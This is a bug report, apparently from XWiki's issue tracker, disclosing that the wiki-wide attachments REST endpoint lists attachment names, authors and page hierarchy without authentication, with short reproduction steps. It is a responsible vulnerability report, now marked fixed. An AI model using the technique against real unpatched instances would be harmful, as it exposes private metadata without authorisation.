Details
-
Bug
-
Resolution: Fixed
-
Critical
-
1.8.1, 1.9 M1
-
XWiki in Kubernetes using xwiki:15.10.11-postgres-tomcat
Description
Hello,
I was testing the XWiki REST API for implementing some custom scripts when I noticed that the /rest/wikis/WikiName/attachments endpoint does not require authentication. Using the "number" query parameter to increase the result count, I am able to get complete lists of wiki attachments including metadata like authors.
It is important to mention that this access only allows a listing of attachments and metadata. However, I still find it rather critical as things like hierarchy, names of files, page naming, and authors can still reveal sensitive information.
I did test my configuration in a number of ways and did not find a way to disable this access. The two "exclude unregistered users" checkboxes are set and I restricted the Guest User denying every right. I also tested in multiple browsers and on private devices to exclude any chance of unnoticed persisting sessions.
It would be great if you could confirm if this is intended behavior or a bad configuration from my side. For testing, I was able to use two seperate Instances of Image 15.10.11-postgres-tomcat. For user authentication we use the oidc-authenticator, but that is not relevant for API access (right?).
To reproduce:
- remove view from guest on the whole wiki
- logout
- access http://127.0.0.1:8080/xwiki/rest/wikis/xwiki/attachments
Attachments
Issue Links
- is caused by
-
XWIKI-3483 Add wiki-wide and space-wide resources for attachments and pages
-
- Closed
-
- is duplicated by
-
XWIKI-22427 Anyone can access all space or page attachments list and metadata via REST API
-
- Closed
-